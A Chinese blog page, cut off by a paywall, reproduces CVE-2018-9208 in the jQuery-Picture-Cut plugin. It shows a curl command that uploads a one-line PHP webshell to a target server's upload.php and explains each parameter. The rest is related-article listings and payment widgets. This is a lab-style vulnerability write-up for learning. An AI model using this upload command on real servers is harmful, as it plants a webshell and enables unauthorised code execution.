基于JavaScript的框架漏洞_javascript框架库漏洞(1)

已于 2024-04-09 07:20:16 修改
阅读量578 收藏 13
点赞数 29
分类专栏: 2024年程序员学习 文章标签: javascript 开发语言 ecmascript
于 2024-04-09 07:20:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60607245/article/details/137533928
版权
本文介绍了两个JavaScript框架的漏洞,包括CVE-2018-9208(jQuery-Picture-Cut插件中的文件上传漏洞)和CVE-2021-21315(Node.js-systeminformation模块的命令注入漏洞)。详细阐述了漏洞利用过程,如利用curl上传恶意PHP文件和利用未过滤参数执行系统命令。同时,给出了学习黑客和网络安全的路线及资源。
摘要由CSDN通过智能技术生成

2、CVE-2018-9208

2.1介绍

picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用**…/core/PictureCut.php** 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。

2.2.准备一个一句话木马的文件

3b45fb0ff86aa3b4ad6be638689c528d.png

2.3.使用curl进行连接,观察是否上传成功。

curl -F “inputOfFile=file” -F “request=upload” -F “enableResize=0” -F “minimumWidthToResize=0” -F “minimumHeightToResize=0” -F “folderOnServer=/” -F “imageNameRandom=1” -F “maximumSize=10000” -F “enableMaximumSize=0” -F “file=@shell.php” http://123.58.224.8:18483/jquery-picture-cut/src/php/upload.php

  • -F “inputOfFile=file”:指定上传文件的参数名为"file"。
  • -F “request=upload”:指定请求类型为上传。
  • -F “enableResize=0”:禁用图片缩放功能。
  • -F “minimumWidthToResize=0”:设置图片最小宽度为0,即不限制宽度。
  • -F “minimumHeightToResize=0”:设置图片最小高度为0,即不限制高度。
  • -F “folderOnServer=/”:指定上传到服务器的目录为根目录。
  • -F “imageNameRandom=1”:设置上传后的文件名为随机生成的文件名。
  • -F “maximumSize=10000”:设置上传文件的最大大小为10000字节。
  • -F “enableMaximumSize
最低0.47元/天 解锁文章
m0_60607245
关注
  • 29
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JavaScript框架资源整合.part2
03-29
JavaScript框架资源整合.part2
retire.js:扫描程序检测已知漏洞JavaScript的使用
01-30
Retire.js您所需要的还必须退休在Web上以及在那里的Node.JS应用程序中都有大量JavaScript。 这极大地简化了开发,但是我们需要保持最新的安全修补程序。 现在,“使用具有已知漏洞的组件”已成为安全风险列表的一...
Javascript框架漏洞验证
wangyuxiang946的博客
11-11 1万+
Javascript框架漏洞 ????前言????漏洞验证????漏洞描述????解决办法????免费福利 ????前言 经常看到漏扫扫出来这个漏洞,查看了网上好多文章都没有正确的验证方法都在扯淡。今天我来点干货记录一下这个漏洞到底是怎么触发JS生成XSS的,也方便后面漏洞验证报...
基于JavaScript框架漏洞_javascript框架漏洞(2)
m0_60607245的博客
04-09 977
picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。中调用**…/core/PictureCut.php** 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。
jquery 文件上传漏洞(CVE-2018-9207)
ak.Gh0st的博客
10-31 734
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码框架)于2006年1月由John Resig发布。
基于JavaScript框架漏洞
weixin_68408599的博客
12-09 2680
本文章是基于JavaScript框架漏洞,相关靶场均在vulhub靶场,此文章只供于学习讨论。
漏洞复现-jquery-picture-cut 任意文件上传_(CVE-2018-9208)
qq_58683895的博客
10-27 544
​ picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。使用命令将一句话木马传上去,目录为volfucs安装该靶场的位置。volfucs靶场复现。
JavaScript_精心策划的CTF框架、资源和软件列表.zip
最新发布
05-20
"awesome-ctf_master.zip"可能包含了一个精心整理的GitHub仓,这个仓通常被称为"Awesome CTF",它集合了各种用于CTF比赛的JavaScript框架、工具和学习资源。这些资料可以帮助参赛者提升在Web安全、逆向工程...
WebPenFw:基于Flask框架,实现Web漏洞信息收集与利用
04-11
WebPenFw是一个基于Python Flask框架构建的Web漏洞信息收集与利用工具。Flask是一个轻量级的Web服务器网关接口(WSGI)Web应用框架,以其简洁和模块化的特性而受到开发者们的喜爱。它提供了基础的路由、模板渲染、...
Swagger API漏洞利用-JavaScript开发
05-26
分析接口是否存在敏感参数,例如url参数,容易引入外网的SSRF漏洞 检测 API认证绕过漏洞 在本地监听一个Web Server,打开Swagger UI界面,供分析接口使用 使用Chrome打开本地Web服务器,并禁用CORS,解决部分API接口...
jQuery-File-Upload—三个漏洞的故事
热门推荐
一个码农的笔记
01-11 3万+
翻译自:https://blog.detectify.com/2018/12/13/jquery-file-upload-a-tale-of-three-vulnerabilities/ 翻译:聂心明 在github上星个数第二多的JavaScript项目中有两个远程命令执行漏洞,并且星数第三多的那个项目可能会通过jQuery-File-Upload任意删掉被上传的文件。后者是有意的行为,我们的安...
CVE-2018-9207 jQuery文件上传漏洞复现
LM01的博客
06-04 1521
CVE-2018-9207 jQuery文件上传漏洞复现
jquery 文件上传 (CVE-2018-9207)漏洞复现
weixin_42675091的博客
09-03 2640
jquery 文件上传 (CVE-2018-9207)漏洞复现
Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-31 1261
Weblogic受影响的版本:此次我们使用的是vnlhub靶场搭建的环境,是vnlhub中的Weblogic漏洞中的CVE-2018-2894靶场,我们 cd 到 CVE-2018-2894,然后输入以下命令启动靶场环境: 输入以下的命令可以查看当前启动的靶场环境: 我们首先通过以下的命令获取Weblogic后台登陆的用户名和密码 然后我们通过URL访问靶场界面然后我们通过用户名weblogic和刚刚获得密码QghFSif4登陆Weblogic后台界面如图,是我们登陆后的界面:登录到后台,我们按照登录 ->
漏洞复现-jquery-文件上传】vulfocus/jquery-cve_2018_9207
10-07 2025
【jquery-文件上传】
jquery-picture-cut 任意文件上传(CVE-2018-9208)
m0_65150886的博客
01-02 469
​ picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。2.准备一句话木马文件 1.php。
jquery-picture-cut 任意文件上传(CVE-2018-9208)
ak.Gh0st的博客
10-31 800
picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。
JS中常见的安全漏洞
weixin_70191743的博客
11-28 2161
JS中常见的安全漏洞
Javascript框架漏洞验证,劲爆
04-17 862
经常看到漏扫扫出来这个漏洞,查看了网上好多文章都没有正确的验证方法都在扯淡。今天我来点干货记录一下这个漏洞到底是怎么触发JS生成XSS的,也方便后面漏洞验证报告的书写。AWVS扫出来的JS框架漏洞RSAS扫出来的JS框架漏洞
检测到目标站点存在javascript框架漏洞,这个怎么修复
07-14
针对目标站点存在的JavaScript框架漏洞,修复方法通常包括以下步骤: 1. 升级框架版本:查找并确定目标站点所使用的JavaScript框架,并检查是否有已修复的版本可供升级。在升级之前,务必备份站点的相关文件和数据。 2. 应用补丁:下载并应用任何相关的安全补丁。这些补丁通常会修复已知的漏洞,并提供更强的安全性。 3. 移除或禁用不必要的功能和插件:如果站点中使用了不必要或不常用的功能和插件,最好考虑将其移除或禁用。这样可以减少潜在的攻击面并提高站点的安全性。 4. 加强输入验证和过滤:确保站点的输入验证机制和过滤器能够有效地检测和阻止恶意输入。使用正则表达式、白名单和黑名单等方法来限制用户输入,以防止跨站脚本攻击(XSS)等安全威胁。 5. 定期进行安全审计:定期对站点进行安全审计,以检测潜在的漏洞和安全风险。可以使用自动化工具或聘请安全专家进行审计。 6. 持续更新和监控:及时关注框架的更新和安全公告,并及时更新站点的相关组件。同时,定期监控站点的日志和活动,以便及时发现并应对任何异常情况。 请注意,修复漏洞需要谨慎操作,建议在测试环境中进行修复,并确保备份站点数据,以防修复过程中出现意外情况。如果您不确定如何修复漏洞,建议咨询安全专家或开发团队的帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值